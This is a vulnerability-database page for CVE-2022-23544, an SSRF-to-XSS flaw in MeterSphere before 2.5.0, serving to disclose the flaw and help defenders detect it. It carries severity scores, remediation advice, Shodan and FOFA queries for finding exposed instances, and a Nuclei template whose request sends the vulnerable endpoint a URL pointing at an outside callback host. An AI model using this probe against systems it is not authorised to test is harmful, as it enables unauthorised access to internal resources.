Lucene search
ProjectDiscoveryNUCLEI:CVE-2022-23544HistoryJun 16, 2023 - 7:48 p.m.
MeterSphere < 2.5.0 SSRF
2023-06-1619:48:01
ProjectDiscovery
github.com
4
metersphere
ssrf
vulnerability
cross-site scripting
issueproxyresourceservice
internal resources
javascript code
7.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
6.6 Medium
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
44.7%
MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in `IssueProxyResourceService::getMdImageByUrl` allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere's origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds.
id: CVE-2022-23544
info:
name: MeterSphere < 2.5.0 SSRF
author: j4vaovo
severity: medium
description: |
MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in `IssueProxyResourceService::getMdImageByUrl` allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere's origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds.
impact: |
An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure.
remediation: |
Upgrade MeterSphere to version 2.5.0 or later to mitigate the SSRF vulnerability.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23544
- https://nvd.nist.gov/vuln/detail/CVE-2022-23544
- https://github.com/metersphere/metersphere/security/advisories/GHSA-vrv6-cg45-rmjj
- https://github.com/metersphere/metersphere/commit/d0f95b50737c941b29d507a4cc3545f2dc6ab121
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-23544
cwe-id: CWE-918,CWE-79
epss-score: 0.00094
epss-percentile: 0.3975
cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: metersphere
product: metersphere
shodan-query:
- html:"metersphere"
- http.html:"metersphere"
fofa-query:
- title="MeterSphere"
- body="metersphere"
- title="metersphere"
tags: cve2022,cve,metersphere,ssrf,oast,xss
http:
- method: GET
path:
- "{{BaseURL}}/resource/md/get/url?url=http://oast.pro"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Interactsh Server'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a00463044022064c48dbddea6759a4b1d98387f4741e455f2719c480890a557f43459af8d86db02202c998413ed0cf079539aa5f86471364ed714c32e12b13eeb93d7c149d7240dad:922c64590222798bb761d5b6d8e72950Related
cve
cve
CVE-2022-23544
2022-12-28 00:15:13
cvelist
cvelist
osv
osv
CVE-2022-23544
2022-12-28 00:15:13
prion
prion
Design/Logic Flaw
2022-12-28 00:15:00
nvd
nvd
CVE-2022-23544
2022-12-28 00:15:13
7.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
6.6 Medium
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
44.7%
Related for NUCLEI:CVE-2022-23544